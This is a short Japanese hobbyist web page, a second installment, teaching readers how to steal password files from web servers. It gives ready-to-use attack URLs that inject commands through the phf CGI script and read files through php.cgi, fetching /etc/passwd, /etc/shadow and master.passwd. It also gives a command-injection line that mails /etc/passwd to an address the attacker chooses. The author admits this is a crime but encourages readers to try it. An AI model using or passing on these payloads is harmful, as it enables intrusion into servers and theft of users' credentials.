こんちは、ささちょんです。

相変わらずあんまり力はありませんが少し勉強してきました。

そして第二段です。

こっちのほうは完璧に犯罪ですので、やっちゃった人には

警察さんからの招待が逮捕状と名のものにやってきますから、注意してね。

さてさて、第二段は相手のパスワードをゲットしてみようってことです。

 

まずはブラウザのURLの所にhttp://アドレス/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwdと入力します。

phfとやらが(←よく知りません。いいのかこんなことで?)使える場所だったらpasswdをGET!!。

でも(見たけど良く分からんかった)shadow(防止みたいなもん?)が掛かったユ−ザ−IDしか取れない場合があります。

そのときはhttp://アドレス/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/master.passwd

or

http://アドレス/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadowと入力してみてね。

もしかしたらshadowが掛かってないpasswdが取れるかもしれないって書いてありました。

 

php(こっちバージョンもあるらしい)

 

こっちも基本的にはphfの時と同じみたいでhttp://アドレス/cgi-bin/php.cgi?/etc/passwdと入力します。

これfile not foundと出てしまったら出来ないです。

もしshadowとやらが掛かっていたりしたら上のようにmasterpasswdやshadowを探してみましょう。

でもねUnable to open:nullというメッセ−ジが表示されたら絶対に無理!

 

mailでパスGETってやりかたも・・・

 

これはmailコマンドを使い指定したアドレスに指定したファイルを送ります。

やり方は;mail 受取人のメ−ルアドレス < /etc/passwd

これが出来ましたらmaster.passwdやshadowを取得できるかな?ってことでやってみてねえ。

↑おいおい、やっちゃいけないだろう(笑)

 

これもたくさんのHPを見ました。そのHPの管理人さん、ありがとう!!